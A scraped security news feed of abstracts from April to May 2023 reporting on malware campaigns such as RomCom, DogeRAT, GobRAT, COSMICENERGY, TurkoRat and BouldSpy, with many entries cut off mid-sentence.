The threat actors behind RomCom RAT are leveraging a network of fake websites advertising rogue versions of popular software at least since July 2022 to infiltrate targets. Cybersecurity firm Trend Micro is tracking the activity cluster under the name Void Rabisu, which is also known as Tropical Scorpius (Unit 42) and UNC2596 (Mandiant). "These lure sites are most likely only meant for a small number of targets, thus making discovery and analysis more difficult," security researchers Feike Hacquebord, Stephen Hilt, Fernando Merces, and Lord Alfred Remorin said . Some of the impersonated apps spotted so far include AstraChat, Devolutions' Remote Desktop Manager, Gimp, GoTo Meeting, KeePass, OpenAI ChatGPT, Signal, Veeam Backup & Replication, and WinDirStat. RomCom RAT was first chronicled by Palo Alto Networks Unit 42 in August 2022, linking it to a financially motivated group deploying Cuba Ransomware (aka COLDDRAW). It's worth noting that there is noThe Hacker News
May 30, 2023
Sneaky DogeRAT Trojan Poses as Popular Apps, Targets Indian Android Users Full Text
Abstract
A new open source remote access trojan (RAT) called DogeRAT targets Android users primarily located in India as part of a sophisticated malware campaign. The malware is distributed via social media and messaging platforms under the guise of legitimate applications like Opera Mini, OpenAI ChatGOT, and Premium versions of YouTube, Netflix, and Instagram. "Once installed on a victim's device, the malware gains unauthorized access to sensitive data, including contacts, messages, and banking credentials," cybersecurity firm CloudSEK said in a Monday report. "It can also take control of the infected device, enabling malicious actions such as sending spam messages, making unauthorized payments, modifying files, and even remotely capturing photos through the device's cameras." DogeRAT, like many other malware-as-a-service ( MaaS ) offerings, is promoted by its India-based developer through a Telegram channel that has more than 2,100 subscribers since it waThe Hacker News
May 29, 2023
AceCryptor: Cybercriminals’ Powerful Weapon, Detected in 240K+ Attacks Full Text
Abstract
A crypter (alternatively spelled cryptor) malware dubbed AceCryptor has been used to pack numerous strains of malware since 2016. Slovak cybersecurity firm ESET said it identified over 240,000 detections of the crypter in its telemetry in 2021 and 2022. This amounts to more than 10,000 hits per month. Some of the prominent malware families contained within AceCryptor are SmokeLoader, RedLine Stealer, RanumBot, Raccoon Stealer, Stop ransomware, and Amadey, among others. The countries with the most detections include Peru, Egypt, Thailand, Indonesia, Turkey, Brazil, Mexico, South Africa, Poland, and India. AceCryptor was first highlighted by Avast in August 2022, detailing the use of the malware to distribute Stop ransomware and RedLine Stealer on Discord in the form of 7-Zip files. Crypters are similar to packers, but instead of using compression, they are known to obfuscate the malware code with encryption to make detection and reverse engineering a lot more challenging.The Hacker News
May 29, 2023
New Go-written GobRAT RAT targets Linux Routers in Japan Full Text
Abstract
A new Golang remote access trojan (RAT), tracked as GobRAT, is targeting Linux routers in Japan, the JPCERT Coordination Center warns. JPCERT/CC is warning of cyberattacks against Linux routers in Japan that have been infected with a new Golang remote...Security Affairs
May 29, 2023
Researchers analyzed the PREDATOR spyware and its loader Alien Full Text
Abstract
Cisco Talos and the Citizen Lab researchers have published a technical analysis of the powerful Android spyware Predator. Security researchers at Cisco Talos and the Citizen Lab have shared technical details about a commercial Android spyware named...Security Affairs
May 29, 2023
Enhanced Legion Credential Harvester Targets SSH Servers and AWS Credentials Full Text
Abstract
An updated version of the Python-based, cloud-focused hack tool called Legion—which can extract credentials from vulnerable web servers—has surfaced. The updated variant incorporates the Paramiko module to exploit SSH servers. Furthermore, it can now retrieve specific AWS credentials associated wit ... Read MoreCyware
May 29, 2023
New GobRAT Remote Access Trojan Targeting Linux Routers in Japan Full Text
Abstract
Linux routers in Japan are the target of a new Golang remote access trojan (RAT) called GobRAT . "Initially, the attacker targets a router whose WEBUI is open to the public, executes scripts possibly by using vulnerabilities, and finally infects the GobRAT," the JPCERT Coordination Center (JPCERT/CC) said in a report published today. The compromise of an internet-exposed router is followed by the deployment of a loader script that acts as a conduit for delivering GobRAT, which, when launched, masquerades as the Apache daemon process (apached) to evade detection. The loader is also equipped to disable firewalls, establish persistence using the cron job scheduler, and register an SSH public key in the .ssh/authorized_keys file for remote access. GobRAT, for its part, communicates with a remote server via the Transport Layer Security ( TLS ) protocol to receive as many as 22 different encrypted commands for execution. Some of the major commands are as follows - ObtThe Hacker News
May 28, 2023
New Bandit Stealer targets web browsers and cryptocurrency wallets Full Text
Abstract
Bandit Stealer is a new stealthy information stealer malware that targets numerous web browsers and cryptocurrency wallets. Trend Micro researchers discovered a new info-stealing malware, dubbed Bandit Stealer, which is written in the Go language...Security Affairs
May 27, 2023
New Stealthy Bandit Stealer Targeting Web Browsers and Cryptocurrency Wallets Full Text
Abstract
A new stealthy information stealer malware called Bandit Stealer has caught the attention of cybersecurity researchers for its ability to target numerous web browsers and cryptocurrency wallets. "It has the potential to expand to other platforms as Bandit Stealer was developed using the Go programming language, possibly allowing cross-platform compatibility," Trend Micro said in a Friday report. The malware is currently focused on targeting Windows by using a legitimate command-line tool called runas.exe that allows users to run programs as another user with different permissions. The goal is to escalate privileges and execute itself with administrative access, thereby effectively bypassing security measures to harvest wide swathes of data. That said, Microsoft's access control mitigations to prevent unauthorized execution of the tool means an attempt to run the malware binary as an administrator requires providing the necessary credentials. "By using theThe Hacker News
May 27, 2023
Pegasus spyware was deployed in Armenia amid Nagorno-Karabakh war Full Text
Abstract
A number of individuals from Armenia contacted the digital rights organizations CyberHUB-AM, an Armenian organization, and Access Now to check their devices for evidence of such spyware.Cyware
May 26, 2023
New CosmicEnergy ICS malware threatens energy grid assets Full Text
Abstract
Experts detailed a new piece of malware, named CosmicEnergy, that is linked to Russia and targets industrial control systems (ICS). Researchers from Mandiant discovered a new malware, named CosmicEnergy, designed to target operational technology...Security Affairs
May 26, 2023
Predator Android Spyware: Researchers Uncover New Data Theft Capabilities Full Text
Abstract
Security researchers have detailed the inner workings of the commercial Android spyware called Predator, which is marketed by the Israeli company Intellexa (previously Cytrox). Predator was first documented by Google's Threat Analysis Group (TAG) in May 2022 as part of attacks leveraging five different zero-day flaws in the Chrome web browser and Android. The spyware, which is delivered by means of another loader component called Alien, is equipped to record audio from phone calls and VoIP-based apps as well as gather contacts and messages, including from Signal, WhatsApp, and Telegram. Its other functionalities allow it to hide applications and prevent applications from being executed upon rebooting the handset. "A deep dive into both spyware components indicates that Alien is more than just a loader for Predator and actively sets up the low-level capabilities needed for Predator to spy on its victims," Cisco Talos said in a technical report. Spyware like PredaThe Hacker News
May 26, 2023
New COSMICENERGY Malware Exploits ICS Protocol to Sabotage Power Grids Full Text
Abstract
A new strain of malicious software that's engineered to penetrate and disrupt critical systems in industrial environments has been unearthed. Google-owned threat intelligence firm Mandiant dubbed the malware COSMICENERGY , adding it was uploaded to the VirusTotal public malware scanning utility in December 2021 by a submitter in Russia. There is no evidence that it has been put to use in the wild. "The malware is designed to cause electric power disruption by interacting with IEC 60870-5-104 (IEC-104) devices, such as remote terminal units ( RTUs ), that are commonly leveraged in electric transmission and distribution operations in Europe, the Middle East, and Asia," the company said . COSMICENERGY is the latest addition to specialized malware like Stuxnet, Havex, Triton, IRONGATE, BlackEnergy2, Industroyer, and PIPEDREAM, which are capable of sabotaging critical systems and wreaking havoc. Mandiant said that there are circumstantial links that it may have beeThe Hacker News
May 25, 2023
Operation “Total Exchange”: New PowerExchange Backdoor Discovered in the UAE Full Text
Abstract
While investigating attacks targeting a government entity in the UAE, Fortinet researchers also discovered an implant on Microsoft Exchange servers which was a novel web shell, dubbed ExchangeLeech, due to its unique ability to harvest credentials.Cyware
May 25, 2023
YouTube Pirated Software Videos Deliver Triple Threat: Vidar Stealer, Laplas Clipper, XMRig Miner Full Text
Abstract
FortiGuard Labs came across an ongoing threat campaign targeting YouTube users searching for pirated software earlier this month. Videos advertising downloads of pirated software are uploaded by verified YouTube channels with large subscriber counts.Cyware
May 24, 2023
Windows Kernel Drivers Used in BlackCat Attacks Full Text
Abstract
Trend Micro revealed that the BlackCat ransomware group is using a signed kernel driver for evasion tactics. The driver was utilized in conjunction with a separate user client executable, with the intention of manipulating, pausing, and terminating specific processes associated with the security on ... Read MoreCyware
May 24, 2023
Data Stealing Malware Discovered in Popular Android Screen Recorder App Full Text
Abstract
Google has removed a screen recording app named "iRecorder - Screen Recorder" from the Play Store after it was found to sneak in information stealing capabilities nearly a year after the app was published as an innocuous app. The app (APK package name "com.tsoft.app.iscreenrecorder"), which accrued over 50,000 installations, was first uploaded on September 19, 2021. The malicious functionality is believed to have been introduced in version 1.3.8, which was released on August 24, 2022. "It is rare for a developer to upload a legitimate app, wait almost a year, and then update it with malicious code," ESET security researcher Lukáš Štefanko said in a technical report. "The malicious code that was added to the clean version of iRecorder is based on the open source AhMyth Android RAT (remote access trojan) and has been customized into what we named AhRat." iRecorder was first flagged as harboring the AhMyth trojan on October 28, 2022, byThe Hacker News
May 24, 2023
Legion Malware Upgraded to Target SSH Servers and AWS Credentials Full Text
Abstract
An updated version of the commodity malware called Legion comes with expanded features to compromise SSH servers and Amazon Web Services (AWS) credentials associated with DynamoDB and CloudWatch. "This recent update demonstrates a widening of scope, with new capabilities such the ability to compromise SSH servers and retrieve additional AWS-specific credentials from Laravel web applications," Cado Labs researcher Matt Muir said in a report shared with The Hacker News. "It's clear that the developer's targeting of cloud services is advancing with each iteration." Legion, a Python-based hack tool, was first documented last month by the cloud security firm, detailing its ability to breach vulnerable SMTP servers in order to harvest credentials. It's also known to exploit web servers running content management systems (CMS), leverage Telegram as a data exfiltration point, and send spam SMS messages to a list of dynamically-generated U.S. mobile numThe Hacker News
May 24, 2023
AhRat Android RAT was concealed in iRecorder app in Google Play Full Text
Abstract
ESET found a new remote access trojan (RAT), dubbed AhRat, on the Google Play Store that was concealed in an Android screen recording app. ESET researchers have discovered an Android app on Google Play that was hiding a new remote access trojan (RAT)...Security Affairs
May 23, 2023
New WinTapix.sys Malware Engages in Multi-Stage Attack Across Middle East Full Text
Abstract
An unknown threat actor has been observed leveraging a malicious Windows kernel driver in attacks likely targeting the Middle East since at least May 2020. Fortinet Fortiguard Labs, which dubbed the artifact WINTAPIX (WinTapix.sys), attributed the malware with low confidence to an Iranian threat actor. "WinTapix.sys is essentially a loader," security researchers Geri Revay and Hossein Jazi said in a report published on Monday. "Thus, its primary purpose is to produce and execute the next stage of the attack. This is done using a shellcode." Samples and telemetry data analyzed by Fortinet show that the campaign's primary focus is on Saudi Arabia, Jordan, Qatar, and the United Arab Emirates. The activity has not been tied to a known threat actor or group. By using a malicious kernel mode driver, the idea is to subvert or disable security mechanisms and gain entrenched access to the targeted host. Such drivers run within the kernel memory and can, thereThe Hacker News
May 22, 2023
KeePass Exploit Allows Attackers to Recover Master Passwords from Memory Full Text
Abstract
A proof-of-concept (PoC) has been made available for a security flaw impacting the KeePass password manager that could be exploited to recover a victim's master password in cleartext under specific circumstances. The issue, tracked as CVE-2023-32784 , impacts KeePass versions 2.x for Windows, Linux, and macOS, and is expected to be patched in version 2.54, which is likely to be released early next month. "Apart from the first password character, it is mostly able to recover the password in plaintext," security researcher "vdohney," who discovered the flaw and devised a PoC, said . "No code execution on the target system is required, just a memory dump." "It doesn't matter where the memory comes from," the researcher added, stating, "it doesn't matter whether or not the workspace is locked. It is also possible to dump the password from RAM after KeePass is no longer running, although the chance of that working goes down wThe Hacker News
May 20, 2023
Malicious VSCode Extensions: Password Theft and Remote Shell Exploits Full Text
Abstract
Check Point took the wraps off of three malicious Microsoft Visual Studio extensions on May 4, 2023, aimed at exploiting VSCode Marketplace visitors. These extensions named Theme Darcula dark, python-vscode, and prettiest java, were downloaded by Windows developers nearly 46,000 times. Actors could ... Read MoreCyware
May 20, 2023
Meet ‘Jack’ from Romania! Mastermind Behind Golden Chickens Malware Full Text
Abstract
The identity of the second threat actor behind the Golden Chickens malware has been uncovered courtesy of a "fatal" operational security blunder, cybersecurity firm eSentire said. The individual in question, who lives in Bucharest, Romania, has been given the codename Jack. He is one of the two criminals operating an account on the Russian-language Exploit.in forum under the name "badbullzvenom," the other being " Chuck from Montreal ." eSentire characterized Jack as the true mastermind behind Golden Chickens. Evidence unearthed by the Canadian company shows that he is also listed as the owner of a vegetable and fruit import and export business. "Like 'Chuck from Montreal,' 'Jack' uses multiple aliases for the underground forums, social media, and Jabber accounts, and he too has gone to great lengths to disguise himself," eSentire researchers Joe Stewart and Keegan Keplinger said . "'Jack' has taken great paThe Hacker News
May 20, 2023
Golang Variant of Cobalt Strike ‘Geacon’ Targets macOS Full Text
Abstract
There is a growing trend in utilizing Geacon (a Golang implementation of the Cobalt Strike beacon), to target macOS devices, revealed SentinelOne. The package appeared specifically crafted to first verify its execution on a macOS system and subsequently retrieve an unsigned 'Geacon Plus' payload fr ... Read MoreCyware
May 19, 2023
NPM packages found containing the TurkoRat infostealer Full Text
Abstract
Experts discovered two malicious packages in the npm package repository, both were laced with an open-source info-stealer called TurkoRat. ReversingLabs discovered two malicious packages, respectively named nodejs-encrypt-agent and nodejs-cookie-proxy-agent,...Security Affairs
May 19, 2023
Developer Alert: NPM Packages for Node.js Hiding Dangerous TurkoRat Malware Full Text
Abstract
Two malicious packages discovered in the npm package repository have been found to conceal an open source information stealer malware called TurkoRat . The packages – named nodejs-encrypt-agent and nodejs-cookie-proxy-agent – were collectively downloaded approximately 1,200 times and were available for more than two months before they were identified and taken down. ReversingLabs, which broke down the details of the campaign, described TurkoRat as an information stealer capable of harvesting sensitive information such as login credentials, website cookies, and data from cryptocurrency wallets. While nodejs-encrypt-agent came fitted with the malware inside, nodejs-cookie-proxy-agent was found to disguise the trojan as a dependency under the name axios-proxy. nodejs-encrypt-agent was also engineered to masquerade as another legitimate npm module known as agent-base , which has been downloaded over 25 million times to date. The list of the rogue packages and their associated versThe Hacker News
May 19, 2023
Researchers Identify Second Developer of ‘Golden Chickens’ Malware Full Text
Abstract
Offered under a malware-as-a-service (MaaS) model since 2018, Golden Chickens has been used by the Russia-based Cobalt Group and FIN6 cybercrime rings to target organizations in various industries, causing financial losses or more than $1.4 billion.Cyware
May 18, 2023
Qualys Discovers New Sotdas Malware Variant Full Text
Abstract
The latest iteration of the Sotdas malware has emerged, showcasing a variety of innovative features and advanced techniques for evading detection. This malware family is written in C++. After achieving persistence and collecting system information, Sotdas leverages this data for optimizing resource ... Read MoreCyware
May 18, 2023
Millions of Smartphones Distributed Worldwide With Preinstalled ‘Guerrilla’ Malware Full Text
Abstract
Since 2021, Trend Micro has been tracking a different operation that appears to be linked to Triada. The group behind the campaign is tracked by the cybersecurity firm as Lemon Group and the malware preloaded on devices is called Guerrilla.Cyware
May 17, 2023
Malicious Microsoft VSCode extensions steal passwords, open remote shells Full Text
Abstract
Cybercriminals are starting to target Microsoft's VSCode Marketplace, uploading three malicious Visual Studio extensions that Windows developers downloaded 46,600 times.BleepingComputer
May 16, 2023
Open-source Cobalt Strike port ‘Geacon’ used in macOS attacks Full Text
Abstract
Geacon, a Go-based implementation of the beacon from the widely abused penetration testing suite Cobalt Strike, is being used more and more to target macOS devices.BleepingComputer
May 16, 2023
CopperStealer Malware Crew Resurfaces with New Rootkit and Phishing Kit Modules Full Text
Abstract
The threat actors behind the CopperStealer malware resurfaced with two new campaigns in March and April 2023 that are designed to deliver two novel payloads dubbed CopperStealth and CopperPhish. Trend Micro is tracking the financially motivated group under the name Water Orthrus . The adversary is also assessed to be behind another campaign known as Scranos , which was detailed by Bitdefender in 2019. Active since at least 2021, Water Orthrus has a track record of leveraging pay-per-install (PPI) networks to redirect victims landing on cracked software download sites to drop an information stealer codenamed CopperStealer . Another campaign spotted in August 2022 entailed the use of CopperStealer to distribute Chromium-based web browser extensions that are capable of performing unauthorized transactions and transferring cryptocurrency from victims' wallets to ones under attackers' control. The latest attack sequences documented by Trend Micro don't mark muThe Hacker News
May 15, 2023
BPFDoor Backdoor Gets Stealthier with New Variant Full Text
Abstract
Cybersecurity experts took the wraps off of a newer variant of BPFDoor (BPF stands for Berkeley Packet Filter), which is capable of maintaining persistent access to breached systems for extended periods. The new variant has remained entirely undetected by all the virus-detection engines on VirusTot ... Read MoreCyware
May 15, 2023
CLR SqlShell Malware Targets MS SQL Servers for Crypto Mining and Ransomware Full Text
Abstract
Poorly managed Microsoft SQL (MS SQL) servers are the target of a new campaign that's designed to propagate a category of malware called CLR SqlShell that ultimately facilitates the deployment of cryptocurrency miners and ransomware. "Similar to web shell, which can be installed on web servers, SqlShell is a malware strain that supports various features after being installed on an MS SQL server, such as executing commands from threat actors and carrying out all sorts of malicious behavior," AhnLab Security Emergency response Center (ASEC) said in a report published last week. A stored procedure is a subroutine that contains a set of Structured Query Language (SQL) statements for use across multiple programs in a relational database management system (RDBMS). CLR (short for common language runtime) stored procedures – available in SQL Server 2005 and later – refer to stored procedures that are written in a .NET language such as C# or Visual Basic. The attack meThe Hacker News
May 12, 2023
XWorm Malware Exploits Follina Vulnerability in New Wave of Attacks Full Text
Abstract
Cybersecurity researchers have discovered an ongoing phishing campaign that makes use of a unique attack chain to deliver the XWorm malware on targeted systems. Securonix, which is tracking the activity cluster under the name MEME#4CHAN , said some of the attacks have primarily targeted manufacturing firms and healthcare clinics located in Germany. "The attack campaign has been leveraging rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload to infect its victims," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a new analysis shared with The Hacker News. The report builds on recent findings from Elastic Security Labs, which revealed the threat actor's reservation-themed lures to deceive victims into opening malicious documents capable of delivering XWorm and Agent Tesla payloads. The attacks begin with phishing attacks to distribute decoy Microsoft Word documents that, instead of using macros, weaponiThe Hacker News
May 12, 2023
New Stealthy Variant of Linux Backdoor BPFDoor Emerges from the Shadows Full Text
Abstract
A previously undocumented and mostly undetected variant of a Linux backdoor called BPFDoor has been spotted in the wild, cybersecurity firm Deep Instinct said in a technical report published this week. " BPFDoor retains its reputation as an extremely stealthy and difficult-to-detect malware with this latest iteration," security researchers Shaul Vilkomir-Preisman and Eliran Nissan said . BPFDoor (aka JustForFun), first documented by PwC and Elastic Security Labs in May 2022, is a passive Linux backdoor associated with a Chinese threat actor called Red Menshen (aka DecisiveArchitect or Red Dev 18), which is known to single out telecom providers across the Middle East and Asia since at least 2021. The malware is specifically geared towards establishing persistent remote access to compromised target environments for extended periods of time, with evidence pointing to the hacking crew operating the backdoor undetected for years. BPFDoor gets its name from the uThe Hacker News
May 10, 2023
Sophisticated DownEx Malware Campaign Targeting Central Asian Governments Full Text
Abstract
Government organizations in Central Asia are the target of a sophisticated espionage campaign that leverages a previously undocumented strain of malware dubbed DownEx . Bitdefender, in a report shared with The Hacker News, said the activity remains active, with evidence likely pointing to the involvement of Russia-based threat actors. The Romanian cybersecurity firm said it first detected the malware in a highly targeted attack aimed at foreign government institutions in Kazakhstan in late 2022. Subsequently, another attack was observed in Afghanistan. The use of a diplomat-themed lure document and the campaign's focus on data exfiltration suggests the involvement of a state-sponsored group, although the exact identity of the hacking outfit remains indeterminate at this stage. The initial intrusion vector for the campaign is suspected to be a spear-phishing email bearing a booby-trapped payload, which is a loader executable that masquerades as a Microsoft Word file. OpeniThe Hacker News
May 10, 2023
Fake Windows System Update Drops Aurora Stealer via Invalid Printer Loader Full Text
Abstract
Attackers are using malicious ads to redirect users to what looks like a Windows security update. The scheme is very well designed as it relies on the web browser to display a full-screen animation resembling what you'd expect from Microsoft.Cyware
May 9, 2023
Building Automation System Exploit Brings KNX Security Back in Spotlight Full Text
Abstract
A public exploit targeting building automation systems has brought KNX security back into the spotlight, with industrial giant Schneider Electric releasing a security bulletin to warn customers about the potential risks.Cyware
May 9, 2023
DrIBAN Toolkit Targets Italian Corporate Banking Full Text
Abstract
Experts at Cleafy disclosed nearly a four-year-long online fraud campaign that infected Windows systems in organizations using drIBAN, a web inject kit. Criminals attempted to alter legitimate banking transfers by changing the beneficiary details and redirecting the funds to their accounts. Organiz ... Read MoreCyware
May 05, 2023
New Android FluHorse malware steals your passwords, 2FA codes Full Text
Abstract
A new Android malware called 'FluHorse' has been discovered, targeting users in Eastern Asia with malicious apps that imitate legitimate versions.BleepingComputer
May 05, 2023
New Android Malware ‘FluHorse’ Targeting East Asian Markets with Deceptive Tactics Full Text
Abstract
Various sectors in East Asian markets have been subjected to a new email phishing campaign that distributes a previously undocumented strain of Android malware called FluHorse that abuses the Flutter software development framework. "The malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs," Check Point said in a technical report. "These malicious apps steal the victims' credentials and two-factor authentication (2FA) codes." The malicious apps have been found to imitate popular apps like ETC and VPBank Neo, which are widely used in Taiwan and Vietnam. Evidence gathered so far shows that the activity has been active since at least May 2022. The phishing scheme in itself is fairly straightforward, wherein victims are lured with emails that contain links to a bogus website that hosts malicious APK files. Also added to the website are checks that aim to screen victims anThe Hacker News
May 5, 2023
Fleckpe Android malware totaled +620K downloads via Google Play Store Full Text
Abstract
Fleckpe is a new Android subscription Trojan that was discovered in the Google Play Store, totaling more than 620,000 downloads since 2022. Fleckpe is a new Android subscription Trojan that spreads via Google Play, the malware discovered by Kaspersky...Security Affairs
May 05, 2023
Fleckpe Android Malware Sneaks onto Google Play Store with Over 620,000 Downloads Full Text
Abstract
A new Android subscription malware named Fleckpe has been unearthed on the Google Play Store, amassing more than 620,000 downloads in total since 2022. Kaspersky, which identified 11 apps on the official app storefront, said the malware masqueraded as legitimate photo editing apps, camera, and smartphone wallpaper packs. The apps have since been taken down. The operation primarily targets users from Thailand, although telemetry data gathered by the Russian cybersecurity firm has revealed victims in Poland, Malaysia, Indonesia, and Singapore. The apps further offer the promised functionality to avoid raising red flags, but conceal their real purpose under the hood. The list of the offending apps is as follows - Beauty Camera Plus (com.beauty.camera.plus.photoeditor) Beauty Photo Camera (com.apps.camera.photos) Beauty Slimming Photo Editor (com.beauty.slimming.pro) Fingertip Graffiti (com.draw.graffiti) GIF Camera Editor (com.gif.camera.editor) HD 4K Wallpaper (com.hd.h4ks.The Hacker News
May 04, 2023
New Fleckpe Android malware installed 600K times on Google Play Full Text
Abstract
A new Android subscription malware named 'Fleckpe' has been spotted on Google Play, the official Android app store, disguised as legitimate apps downloaded over 620,000 times.BleepingComputer
May 4, 2023
Experts devised a new exploit for the PaperCut flaw that can bypass all current detection Full Text
Abstract
VulnCheck researchers devised a new exploit for a recently disclosed critical flaw in PaperCut servers that bypasses all current detections. Cybersecurity researchers from VulnCheck have developed a new exploit for the recently disclosed critical...Security Affairs
May 4, 2023
Facebook warns of a new information-stealing malware dubbed NodeStealer Full Text
Abstract
Facebook discovered a new information-stealing malware, dubbed 'NodeStealer,' that is being distributed on Meta. NodeStealer is a new information-stealing malware distributed on Meta that allows stealing browser cookies to hijack accounts on multiple...Security Affairs
May 4, 2023
AresLoader Masquerades as Citrix Project to Drop Multiple Payloads Full Text
Abstract
Experts at Cyble laid bare AresLoader, a new type of loader that distributes multiple malware strains, including IcedID, Aurora Stealer, and Laplas Clipper. A GitHub repository masquerading as a Citrix project was being used to distribute the malware. Experts recommend creating multiple lines ... Read MoreCyware
May 3, 2023
AresLoader Malware Attacking Citrix Users Through Malicious GitLab Repo Full Text
Abstract
Cyble has recently detected AresLoader, a novel loader that is found to be disseminating numerous malware families. Malware loaders are designed to deploy and execute diverse malware strains on the targeted computer system of the victim.Cyware
May 02, 2023
BouldSpy Android Spyware: Iranian Government’s Alleged Tool for Spying on Minority Groups Full Text
Abstract
A new Android surveillanceware possibly used by the Iranian government has been used to spy on over 300 individuals belonging to minority groups. The malware, dubbed BouldSpy , has been attributed with moderate confidence to the Law Enforcement Command of the Islamic Republic of Iran ( FARAJA ). Targeted victims include Iranian Kurds, Baluchis, Azeris, and Armenian Christian groups. "The spyware may also have been used in efforts to counter and monitor illegal trafficking activity related to arms, drugs, and alcohol," Lookout said , based on exfiltrated data that contained photos of drugs, firearms, and official documents issued by FARAJA. BouldSpy, like other Android malware families, abuses its access to Android's accessibility services and other intrusive permissions to harvest sensitive data such as web browser history, photos, contact lists, SMS logs, keystrokes, screenshots, clipboard content, microphone audio, and video call recordings. It's worth poinThe Hacker News
May 02, 2023
LOBSHOT: A Stealthy, Financial Trojan and Info Stealer Delivered through Google Ads Full Text
Abstract
In yet another instance of how threat actors are abusing Google Ads to serve malware, a threat actor has been observed leveraging the technique to deliver a new Windows-based financial trojan and information stealer called LOBSHOT . "LOBSHOT continues to collect victims while staying under the radar," Elastic Security Labs researcher Daniel Stepanic said in an analysis published last week. "One of LOBSHOT's core capabilities is around its hVNC (Hidden Virtual Network Computing) component. These kinds of modules allow for direct and unobserved access to the machine." The American-Dutch company attributed the malware strain to a threat actor known as TA505 based on infrastructure historically connected to the group. TA505 is a financially motivated e-crime syndicate that overlaps with activity clusters tracked under the names Evil Corp, FIN11, and Indrik Spider. The latest development is significant because it's a sign that TA505, which is associateThe Hacker News
May 2, 2023
New Lobshot hVNC malware spreads via Google ads Full Text
Abstract
The previously undetected LOBSHOT malware is distributed using Google ads and gives operators VNC access to Windows devices. Researchers from Elastic Security Labs spotted a new remote access trojan dubbed LOBSHOT was being distributed through Google...Security Affairs
May 01, 2023
New Decoy Dog Malware Toolkit Uncovered: Targeting Enterprise Networks Full Text
Abstract
An analysis of over 70 billion DNS records has led to the discovery of a new sophisticated malware toolkit dubbed Decoy Dog targeting enterprise networks. Decoy Dog , as the name implies, is evasive and employs techniques like strategic domain aging and DNS query dribbling, wherein a series of queries are transmitted to the command-and-control (C2) domains so as to not arouse any suspicion. "Decoy Dog is a cohesive toolkit with a number of highly unusual characteristics that make it uniquely identifiable, particularly when examining its domains on a DNS level," Infoblox said in an advisory published late last month. The cybersecurity firm, which identified the malware in early April 2023 following anomalous DNS beaconing activity, said its atypical characteristics allowed it to map additional domains that are part of the attack infrastructure. That said, the usage of Decoy Dog in the wild is "very rare," with the DNS signature matching less than 0.0000027%The Hacker News
May 1, 2023
Experts spotted a new sophisticated malware toolkit called Decoy Dog Full Text
Abstract
Infoblox researchers discovered a new sophisticated malware toolkit, dubbed Decoy Dog, targeting enterprise networks. While analyzing billions of DNS records, Infoblox researchers discovered a sophisticated malware toolkit, dubbed Decoy...Security Affairs
May 1, 2023
Iranian govt uses BouldSpy Android malware for internal surveillance operations Full Text
Abstract
Iranian authorities have been spotted using the BouldSpy Android malware to spy on minorities and traffickers. Researchers at the Lookout Threat Lab have discovered a new Android surveillance spyware, dubbed BouldSpy, that was used by the Law Enforcement...Security Affairs
May 1, 2023
‘BouldSpy’ Android Malware Used in Iranian Government Surveillance Operations Full Text
Abstract
On the infected devices, BouldSpy harvests account usernames and associated application/service, a list of installed apps, browser data, call logs, clipboard content, contact lists, device information, a list of files and folders, and SMS messages.Cyware
May 01, 2023
Google Blocks 1.43 Million Malicious Apps, Bans 73,000 Bad Accounts in 2022 Full Text
Abstract
Google disclosed that its improved security features and app review processes helped it block 1.43 million bad apps from being published to the Play Store in 2022. In addition, the company said it banned 173,000 bad accounts and fended off over $2 billion in fraudulent and abusive transactions through developer-facing features like Voided Purchases API, Obfuscated Account ID, and Play Integrity API. The addition of identity verification methods such as phone number and email address to join Google Play contributed to a reduction in accounts used to publish apps that go against its policies, Google pointed out. The search behemoth further said it "prevented about 500K submitted apps from unnecessarily accessing sensitive permissions over the past 3 years." "In 2022, the App Security Improvements program helped developers fix ~500K security weaknesses affecting ~300K apps with a combined install base of approximately 250B installs," it noted . In contrast,The Hacker News
April 29, 2023
ViperSoftX uses more sophisticated encryption and anti-analysis techniques Full Text
Abstract
A new variant of the information-stealing malware ViperSoftX implements sophisticated techniques to avoid detection. Trend Micro researchers observed a new ViperSoftX malware campaign that unlike previous attacks relies on DLL sideloading for its arrival...Security Affairs
April 29, 2023
Atomic macOS Stealer is advertised on Telegram for $1,000 per month Full Text
Abstract
Atomic macOS Stealer is a new information stealer targeting macOS that is advertised on Telegram for $1,000 per month. Cyble Research and Intelligence Labs (CRIL) recently discovered a Telegram channel advertising a new information-stealing malware,...Security Affairs
April 28, 2023
Atomic - New macOS Info-stealer in Town Full Text
Abstract
Private Telegram channels are being abused by cybercriminals to sell a new macOS malware variant that can infect over 50 cryptocurrency extensions to steal data. Dubbed Atomic, the malware author provides its buyers a ready-to-use web panel for easy victim management, a cryptocurrency checker, a Me ... Read MoreCyware
April 28, 2023
New Atomic macOS Malware Steals Keychain Passwords and Crypto Wallets Full Text
Abstract
Threat actors are advertising a new information stealer for the Apple macOS operating system called Atomic macOS Stealer (or AMOS) on Telegram for $1,000 per month, joining the likes of MacStealer . "The Atomic macOS Stealer can steal various types of information from the victim's machine, including Keychain passwords, complete system information, files from the desktop and documents folder, and even the macOS password," Cyble researchers said in a technical report. Among other features include its ability to extract data from web browsers and cryptocurrency wallets like Atomic, Binance, Coinomi, Electrum, and Exodus. Threat actors who purchase the stealer from its developers are also provided a ready-to-use web panel for managing the victims. The malware takes the form of an unsigned disk image file (Setup.dmg) that, when executed, urges the victim to enter their system password on a bogus prompt to escalate privileges and carry out its malicious activities --The Hacker News
April 28, 2023
New TrafficStealer Malware Monetizes Network Traffic Full Text
Abstract
TrendMicro uncovered a new risk to Docker containers from a piece of malware called TrafficStealer. It influences web traffic and ad interaction via the use of containers to generate illegal income. TrafficStealer uses a combination of two techniques: web crawling and click simulation. Experts ... Read MoreCyware
April 28, 2023
ViperSoftX InfoStealer Adopts Sophisticated Techniques to Avoid Detection Full Text
Abstract
A significant number of victims in the consumer and enterprise sectors located across Australia, Japan, the U.S., and India have been affected by an evasive information-stealing malware called ViperSoftX . ViperSoftX was first documented by Fortinet in 2020, with cybersecurity company Avast detailing a campaign in November 2022 that leveraged the malware to distribute a malicious Google Chrome extension capable of siphoning cryptocurrencies from wallet applications. Now a new analysis from Trend Micro has revealed the malware's adoption of "more sophisticated encryption and basic anti-analysis techniques, such as byte remapping and web browser communication blocking." The arrival vector of ViperSoftX is typically a software crack or a key generator (keygen), while also employing actual non-malicious software like multimedia editors and system cleaner apps as "carriers." One of the key steps performed by the malware before downloading a first-stage PoThe Hacker News
April 27, 2023
LimeRAT Malware Analysis: Extracting the Config Full Text
Abstract
